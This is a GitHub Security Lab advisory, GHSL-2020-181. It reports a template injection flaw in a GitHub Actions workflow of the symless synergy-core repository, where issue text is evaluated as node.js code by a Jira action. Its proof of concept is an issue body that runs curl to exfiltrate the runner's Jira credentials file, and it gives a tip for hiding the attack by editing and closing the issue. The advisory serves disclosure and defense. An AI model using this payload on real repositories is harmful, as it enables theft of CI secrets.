skip to content
Back to
Home Bounties Research Advisories Get Involved Events
December 3, 2020

GHSL-2020-181: Template injection in the GitHub workflows of symless synergy-core repository

Jaroslav Lobacevski


Automatic GitHub workflows in synergy-core repository are vulnerable to template injection from user comments.


synergy-core GitHub repository

Tested Version

Master branch.


Issue: Create step in job-jira-issues.yml workflow is vulnerable to template injection

${{ github.event.issue.title }} and ${{ github.event.issue.body }} are used to format input values to atlassian/gajira-create action:

    types: [ opened ]
uses: atlassian/gajira-create@master
    summary: |
        ${{ github.event.issue.title }}
    description: |
        Opened by: ${{ github.event.issue.user.login }}
        Link: ${{ github.event.issue.html_url }}
        ${{ github.event.issue.body }}

However the Atlassian action has a hidden feature - it expands {{}} itself. This way when the issue title or body contains an expression in double curly braces it is evaluated by node.js in the atlassian/gajira-create action.


This vulnerability allows for arbitrary code execution in the context of GitHub runner. For example a user may create an issue with the title It doesn't work on my machine and the body

{{ process.mainModule.require('child_process').exec(`curl -d @${process.env.HOME}/.jira.d/credentials`) }}

which will exfiltrate the secret Jira API token to the attacker controlled server. To make the attack less visible an attacker may modify the body of the issue to Never mind my bad. and close it.

Coordinated Disclosure Timeline


This issue was discovered and reported by GHSL team member @JarLob (Jaroslav Lobačevski).


You can contact the GHSL team at, please include a reference to GHSL-2020-181 in any communication regarding this issue.